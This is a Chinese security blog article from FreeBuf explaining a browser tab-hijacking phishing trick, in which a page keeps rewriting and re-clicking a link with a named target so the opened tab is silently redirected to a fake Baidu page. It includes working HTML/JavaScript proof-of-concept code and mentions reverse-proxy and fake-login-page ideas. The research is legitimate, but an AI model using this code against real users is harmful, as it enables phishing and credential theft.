freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

前端黑魔法之远程控制地址栏
2018-03-12 08:00:04
所属地 陕西省

*本文原创作者:phithon,本文属FreeBuf原创奖励计划,未经许可禁止转载

由于今天看到一篇文章《危险的 target="_blank" 与 “opener”》,里面提到了一个老知识点,就是target="_blank"的时候,新打开的页面可以通过window.opener来控制源页面的URL,进行钓鱼攻击。这个攻击手法我在博客《神奇的opener对象》中也说过,这里就不再赘述了。这篇文章抛出另一种与target有关的钓鱼攻击。

0x01 效果演示

首先可以看一个小例子:http://675ba661.2m1.pw/41593a

钓鱼
(点击查看大图)

见上图,打开上述链接,然后点击“click me”,打开了百度。这时查看地址栏,的的确确是百度,然后我们等待10秒,再次查看地址栏,这个时候已经变成攻击者的网址了;即使此时我们再访问淘宝等页面,只要仍然在这个标签页下,地址栏就仍然会被控制。

0x02 原理说明

上述页面的代码也很简单:

<html>
<head><meta charset="utf-8"></head>
<body>
<a href="https://www.baidu.com" target="baidu" id="baidu" onclick="return start()">click me</a>
<script>
function start() {
    setInterval(function() {
        baidu.href="http://675ba661.2m1.pw/baidu";
        baidu.click();
    }, 10000);
}
</script>
</body>
</html>

如果用户点击了超链接“click me”,这里会启动一个循环定时器,每过10秒钟,将会将超链接的地址更换成一个仿百度的钓鱼网站,并再次点击。(当然,如果是真实攻击的话,最好是做一个真实目标的反代服务器,这个在我另一篇文章《openresty+lua在反向代理服务中的玩法》中也有详细的介绍)

这里,超链接的target属性指定目标URL在哪个页面下打开,就是目标页面的window.name。如果这个a标签的href发生了变化,再次点击链接,页面仍然会在相同的标签页下打开,所以就覆盖了上一次打开的页面。

比如,我们是一个“网址导航”类型的恶意网站,用户在我们网站上打开了百度、淘宝等标签页面,我们将可以根据用户打开的超链接来生成钓鱼页面,伪造这些网站的登录页面,精准地进行钓鱼。我这里就不进行演示了。

0x03 扩展尝试

除了超链接以外,用window.open也可以达到一样的效果:

<html>
<head><meta charset="utf-8"></head>
<body>
<a href="javascript:;" onclick="return start()">click me</a>
<script>
function start() {
    var w = window.open('https://www.baidu.com', 'baidu');
    setInterval(function() {
        w.location = 'http://675ba661.2m1.pw/baidu'
    }, 5000)
}
</script>
</body>
</html>

不过,window.open经常会被广告拦截相关的功能给阻止掉,所以可能效果不如直接用超链接。

那么,继续深入研究。这个现象究竟是否和window.name有关呢?那么是不是我们知道了某个页面的name,即可对其页面的URL进行控制?

我们可以做一个实验。

编写A页面( http://a.675ba661.2m1.pw/A_victim ):

<html>
<head><meta charset="utf-8"></head>
<body>
<p>Hello world.</p>
<script>
window.name = 'baidu';
</script>
</body>
</html>

编写B页面( http://b.675ba661.2m1.pw/B_attacker ):

<html>
<head><meta charset="utf-8"></head>
<body>
<a href="https://www.baidu.com" target="baidu" id="baidu">click me</a>
</body>
</html>

A页面是目标网站,其中设置自己的name是baidu;B是攻击者的页面,其中设置target="baidu"

显然,我们在B中点击“click me”以后,会打开一个新的页面,而不是修改A页面的URL。这个实验说明,URL的远程控制和window.name没有直接关系,而是和页面的父子关系有关。

0x04 总结

本文所描述的攻击方式和opener的攻击方式比较相似,都是在不能跨域的情况下,控制目标标签页的URL,进而进行钓鱼攻击。

但我觉得这个攻击持久型更佳,因为即使用户在新标签中输入自己的域名,或者又通过超链接点击到其他网站里,这个页面的地址栏永远是受到源页面的控制的。理论上在源页面不关闭的情况下,可以永久控制新页面的地址栏。

*本文原创作者:phithon,本文属FreeBuf原创奖励计划,未经许可禁止转载

# 地址栏 # target
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者